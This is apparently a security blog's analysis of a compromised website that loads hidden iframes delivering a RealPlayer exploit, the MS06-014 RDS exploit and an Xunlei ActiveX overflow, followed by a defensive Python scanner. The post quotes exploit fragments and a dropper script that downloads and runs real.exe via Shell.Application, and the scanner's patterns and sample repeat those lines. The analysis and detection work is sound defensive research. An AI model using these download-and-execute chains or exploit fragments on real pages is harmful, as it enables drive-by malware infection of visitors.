[MALWARE] Multiple Malware and Exploits on a Chinese WebSite

Hi,

A new virus, similar to the 31joy.com/rb.vg one, has attacked several websites (one in particular, {CENSORED}.biz). It appears to change the IP address of infected machines to the gateway address, throwing the local network into chaos and infecting additional machines.

Victims that browse this website are first exploited (if their machines are poorly hardened) and then infected with adware and spyware.

I analysed the website with Malzilla. The infection is a classic one: malicious code is inserted at the top of the pages, so when a victim visits the site four infected iframes are loaded, and some ‘.js’ and ‘.cab’ files are downloaded.

hxxp://{CENSORED}.biz/index.html
hxxp://{CENSORED}.biz/2.htm
hxxp://{CENSORED}.biz/xl.htm
http://{CENSORED}.php?id{CENSORED}we{CENSORED}=pic1

Let’s analyse the first iframe. It loads a .js:

function RealExploit()
{
var user = navigator.userAgent.toLowerCase();
if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)

[…]

else if(RealVersion == "6.0.14.544")
ret = unescape("%63%11%08%60");
else if(RealVersion == "6.0.14.550")
ret = unescape("%63%11%04%60");
else if(RealVersion == "6.0.14.552")
ret = unescape("%79%31%01%60");
else if(RealVersion == "6.0.14.543")
ret = unescape("%79%31%09%60");
else if(RealVersion == "6.0.14.536")
ret = unescape("%51%11%70%63");

[…]

}

It’s clear that the first iframe launches the well-known RealPlayer exploit (the script branches on the RealVersion it finds), which allows remote code execution.

The second iframe, 2.htm, leads to another JavaScript:

function init()
{

var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

This CLSID is suspicious, so let’s look it up: it is another common exploit, RDS.DataStore – Data Execution (CVE-2006-0003 / MS06-014). The iframe itself loads other objects:
0614.js
MPS.js
PowerPlayerCtrl.js

4.CAB -> contains bd.exe or r.exe, which is Worm/Cekar.A

Let’s look at the first one, 0614.js:

var url="http://{CENSORED}/real.exe";
[…]
xml.Open("GET",url,0);
xml.Send();
as.type=1;
as.open();
as.write(xml.responseBody);
path="..\\ntuser.com";
as.savetofile(path,2);
as.close();
var shell=ado.createobject("Shell.Application","");
shell.ShellExecute("cmd.exe","/c " + path,"","open",0);
}
[…]

The preceding Data Execution exploit calls this JavaScript, which downloads and executes real.exe. That file is obviously a virus: Win32.Worm.Cekar.

W32/Cekar-A includes functionality to download code from a preconfigured website to the local disk.

When first run, W32/Cekar-A creates the following files:

\setup.exe
<System>\internat.exe
\autorun.inf

–> Third iframe: xl.htm

It calls clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F, another exploit, which targets a buffer overflow in the Xunlei Thunder PPLAYER.DLL_1_WORK ActiveX control and leads to yet another remote code execution.

–> Last iframe: it seems to be only a counter.
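To turn the indicators in this post into something a defender can actually run against a captured page, here is an added example (my own code, written for this post; it is not from the original post, from Malzilla, or from any tool mentioned above). It is a small static scanner in Python that flags the two CLSIDs quoted above, hidden or zero-sized iframes, the XMLHTTP -> ADODB stream -> ShellExecute dropper chain seen in 0614.js, and a RealVersion branch table like the one in the first script. The CLSID labels are the post’s own descriptions; the three sample inputs are constructed for the example (the RealVersion fragment uses placeholder bytes, not the values from the page).

```python
import re

# ActiveX CLSIDs quoted in the post, labelled with the post's descriptions.
KNOWN_BAD_CLSIDS = {
    "BD96C556-65A3-11D0-983A-00C04FC29E36": "RDS control, CVE-2006-0003 / MS06-014",
    "F3E70CEA-956E-49CC-B444-73AFE593AD7F": "Xunlei Thunder PPLAYER.DLL_1_WORK overflow",
}

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# Zero-sized or CSS-hidden frames: the usual way injected iframes stay invisible.
HIDDEN_RE = re.compile(
    r"""(?:width|height)\s*=\s*["']?0\b|display\s*:\s*none|visibility\s*:\s*hidden""",
    re.IGNORECASE)
CLSID_RE = re.compile(
    r"clsid:\s*([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})", re.IGNORECASE)

# The three stages of the 0614.js dropper: fetch a binary over XMLHTTP, write
# its responseBody to disk through an ADODB stream, launch it via Shell.Application.
DROPPER_MARKERS = (
    re.compile(r"\.responseBody\b", re.IGNORECASE),
    re.compile(r"\.savetofile\s*\(", re.IGNORECASE),
    re.compile(r"Shell\.Application|\.ShellExecute\s*\(", re.IGNORECASE),
)

# A run of 'RealVersion == "x.y.z.w"' branches, each assigning unescape()'d
# bytes, is the structure of the RealPlayer script in the first iframe.
VERSION_BRANCH_RE = re.compile(
    r"""RealVersion\s*==\s*["']\d+(?:\.\d+)+["']\s*\)\s*ret\s*=\s*unescape\s*\(""",
    re.IGNORECASE)


def scan(content):
    """Static scan of one page or script body; returns a findings dict."""
    report = {"iframes": [], "hidden_iframes": 0, "clsids": [],
              "dropper_chain": False, "realplayer_table": False}
    for m in IFRAME_RE.finditer(content):
        attrs = m.group(1)
        src = SRC_RE.search(attrs)
        report["iframes"].append(src.group(1) if src else "(no src)")
        if HIDDEN_RE.search(attrs):
            report["hidden_iframes"] += 1
    for m in CLSID_RE.finditer(content):
        clsid = m.group(1).upper()
        report["clsids"].append((clsid, KNOWN_BAD_CLSIDS.get(clsid, "unknown")))
    report["dropper_chain"] = all(p.search(content) for p in DROPPER_MARKERS)
    # Require several branches so a single legitimate version check does not fire.
    report["realplayer_table"] = len(VERSION_BRANCH_RE.findall(content)) >= 3
    return report


def verdict(report):
    """Map findings to (label, reasons); hidden iframes alone are only suspicious."""
    reasons = []
    bad = [label for _, label in report["clsids"] if label != "unknown"]
    if bad:
        reasons.append("known-exploitable CLSID: " + "; ".join(bad))
    if report["dropper_chain"]:
        reasons.append("XMLHTTP -> ADODB stream -> ShellExecute dropper chain")
    if report["realplayer_table"]:
        reasons.append("RealVersion branch table with unescape()'d bytes")
    if reasons:
        return "malicious", reasons
    if report["hidden_iframes"]:
        return "suspicious", ["%d hidden iframe(s)" % report["hidden_iframes"]]
    return "clean", []


# Constructed sample mimicking the injected page described in the post (not a capture).
SAMPLE_INJECTED = """
<iframe src="2.htm" width=0 height=0></iframe>
<iframe src="xl.htm" style="display:none"></iframe>
<iframe src="count.php?id=pic1" width=0 height=0></iframe>
<script>
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
as.write(xml.responseBody);
as.savetofile(path,2);
var shell=ado.createobject("Shell.Application","");
shell.ShellExecute("cmd.exe","/c " + path,"","open",0);
</script>
<object classid="clsid:f3e70cea-956e-49cc-b444-73afe593ad7f"></object>
"""

# Constructed fragment with the RealVersion branch structure (placeholder bytes).
SAMPLE_REAL_JS = """
if(RealVersion == "6.0.14.544") ret = unescape("%41%41%41%41");
else if(RealVersion == "6.0.14.550") ret = unescape("%42%42%42%42");
else if(RealVersion == "6.0.14.552") ret = unescape("%43%43%43%43");
"""

# Constructed benign page: a visible embed and ordinary DOM code.
SAMPLE_BENIGN = """
<iframe src="https://example.org/embed" width="560" height="315"></iframe>
<script>document.getElementById("player").play();</script>
"""

if __name__ == "__main__":
    for name, body in (("injected", SAMPLE_INJECTED), ("real.js", SAMPLE_REAL_JS),
                       ("benign", SAMPLE_BENIGN)):
        print(name, *verdict(scan(body)))
```

The scanner is deliberately structural rather than signature-based: a page is called malicious only on a known-exploitable CLSID, the full three-stage dropper chain, or a multi-branch RealVersion table, while hidden iframes on their own are reported as suspicious, since tracking pixels and embeds use the same trick. Feed it the raw HTML and each fetched .js separately, as Malzilla shows them, because the chain in the post is split across index.html, 2.htm and 0614.js.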

See you at the next post! 🙂
